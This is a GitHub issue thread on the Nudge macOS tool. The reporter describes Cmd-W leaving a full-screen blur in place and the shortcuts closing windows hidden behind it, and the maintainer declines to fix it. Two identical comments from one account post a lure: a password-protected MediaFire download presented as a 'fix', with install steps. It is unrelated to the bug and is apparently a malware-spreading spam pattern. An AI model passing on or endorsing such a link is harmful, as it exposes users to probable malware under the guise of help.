### ISSUE TITLE
Cmd-W shortcut closes Nudge window but does not remove full-screen blur & shortcut targets active window/app behind the blur

### ISSUE THREAD

**Issue by securitygeneration** [macadmins/nudge#651]
When simulating, `Command-W` closes the Nudge window, but the full-screen blur doesn’t get removed. You have to Command-Tab to the terminal window and Ctrl-C the terminate the Nudge process to get the blur removed (Cmd-Q works as expected).

Related to this: when Nudge launches and blurs the screen, it also auto-launches Software Update in the background (you can see it appear). But because it has done so, the Nudge window loses focus. So hitting Cmd-W or Cmd-Q actually closes the System Settings window, rather than Nudge itself. If you keep pressing Cmd-W or Cmd-Q, it’ll keep closing windows/quitting apps behind the blur, rather than Nudge itself.

The fix is ideally two-fold: 

1. Cmd-W closes Nudge _and_ removes the blur
2. Pressing Cmd-W or Cmd-Q when Nudge is active, closes Nudge, and not whatever window/app is hidden behind the blur.

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Gyuan89** [comment]
i am also seen this happening.

**Comment by erikng** [comment]
I don't plan on fixing this. 99.99% of user base will never see this and it will complicate the code just for admins who are doing synthetic tests.
